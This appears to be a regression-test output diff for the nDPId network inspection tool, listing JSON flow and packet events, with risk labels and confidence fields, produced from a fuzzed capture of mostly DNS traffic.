 00419{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120470305063,"pkt":"\/\/\/\/qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":363,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1120470307336,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470307336,"pkt":"AFNUADRWAEjtAW69CABFAABIausAAIARTGbAqAECwKgBAQrSADUANCnz\/\/8BAABGAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
+00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470307336,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470113337,"flow_last_seen":1120470121594,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470129591,"flow_last_seen":1120470129593,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2755,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470216686,"flow_last_seen":1120470216688,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2761,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470216783,"flow_last_seen":1120470219780,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2762,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1120470315338,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470315338,"pkt":"ADBUADRWAODtAW69CABFAABEauwAAIARTGnAqAE5wKgBAQrTADUAMCcL\/eAAAAABAAAAAAAAATEBMAEw3TEyNwdpbi1hZGRyBGFycHcAAAwAAQ=="}
-00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470315338,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1120470315340,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470315340,"pkt":"AODtAW68ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtMARwmH\/eCAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQBhJxAACwlsb2NhbGhvc3QA"}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470315340,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00354{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"ts_msec":1120470315341,"pkt":"ADBUADRWAODtAW69CABFAAAhau0AUoARGB8NqAEC1PIhIxPEE8QADcBLICAgNiA="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":367,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":13}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1120470315653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1120470315653,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlau4AAIARSsjAqAECwKgB\/wCKAIoA0VstEQ6FJ8CoAQIAigC7AAAgRUVEQURBRENERURHREZDtkNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFOEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP9TTUIlNgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhBFYAAwABAAAAAgA2AFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoARDAwMjQ2NQAAAAAAAAAAAAUAA2EAAA8BVaoA"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470315653,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470141614,"flow_last_seen":1120470150621,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120470233796,"flow_last_seen":1120470242804,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1120470327552,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470327552,"pkt":"ADBUOzRWAODtAW69CABFAABIau8AAIARTGLAqAECwKgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY6qqqqqqqqqqqqqqqqqqqqo="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470327552,"flow_last_seen":1120470327552,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470327552,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1120470328547,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470328547,"pkt":"ADBUADRWAODtAW69CABFQABIavAAAIARTGHAqAECwKgBAQrUADUANIwPneEBAACQAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
+00874{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":372,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470327552,"flow_last_seen":1120470328547,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470328547,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1120470330550,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470330550,"pkt":"ADBUADRWAODtAW69CABFAABIavEAAIARTGDAqAECwKgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAAX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470327552,"flow_last_seen":1120470330550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470330550,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip","num_queries":0,"num_answers":0,"reply_code":0,"query_type":24437,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":373,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470327552,"flow_last_seen":1120470330550,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470330550,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip","num_queries":0,"num_answers":0,"reply_code":0,"query_type":24437,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470332553,"flow_last_seen":1120470332553,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470332553,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.184.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1120470332553,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470332553,"pkt":"ADBUADRWAODtAW69CABFAABIavIAAIARTF\/AqAECwLgBAQrUADUANIwPneEBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
